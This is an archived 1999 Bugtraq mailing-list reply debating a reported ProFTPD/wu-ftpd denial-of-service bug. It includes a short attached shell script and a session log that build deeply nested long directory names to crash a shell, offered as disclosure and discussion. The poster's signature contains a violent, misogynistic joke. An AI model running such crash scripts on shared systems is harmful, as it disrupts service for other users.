Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1999_1

Bugtraq archives for 1st quarter (Jan-Mar) 1999: Re: Pro/wuFTPD DoS

Re: Pro/wuFTPD DoS

Ultor (UltorSOWATECH.COM.PL)
Sat, 13 Feb 1999 19:18:15 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Daniele Orlandi: "Re: ISS Internet Scanner Cannot be relied upon for conclusive"
Previous message: pw: "Mail-Max Remote Buffer Overflow Exploit"

To jest wieloczêœciowa wiadomoœæ w formacie MIME.

------=_NextPart_000_01BE5785.9ACDD480
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Hi

> yes,
>=20
> kills patched ProFTPD dead.
>=20
> -----snip-----
>=20
> #!/usr/local/bin/perl
> # ftpd thingy
> # bubbabubba.org

[CUTED]
=20
> -----snip-----
>
> Ken Williams
> jkwilli2csc.ncsu.edu


Hmmm i think that the problem here isn't overflow in ProFTPD.
Here is a proof.

first run attached 'sux' to make directories ...

----- snip -------
# pwd
/mnt/
# ./sux
    ok now just cd that directories
# cd A*
[CUTED]
# cd A*
ultor:/mnt/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# cd A*


Welcome to Linux 2.0.35.

ultor login:

----- snip -------=20

nice heh :)


Greeetz

-------------------------------------------------------------
 "I hack the heads off little girls and put them on my wall"
  ULT0R [Ultorsowatech.com.pl] - NETWORK SECURITY ADVISER
------=_NextPart_000_01BE5785.9ACDD480
Content-Type: application/octet-stream; name="sux"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="sux"

#!/bin/sh
#
# stupid thing which shows overflows in some toolz
#
# Contact: ultorsowatech.com.pl

STRING=3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAA

i=3D0

while [ $i -le 15 ]
do=20
  i=3D`expr $i + 1`
  mkdir $STRING
  cd $STRING
  echo DIR MADE $i
done
echo NOW JUST DO $ cd XXXXXX* UNTIL IT CRASH

------=_NextPart_000_01BE5785.9ACDD480--

Next message: Daniele Orlandi: "Re: ISS Internet Scanner Cannot be relied upon for conclusive"
Previous message: pw: "Mail-Max Remote Buffer Overflow Exploit"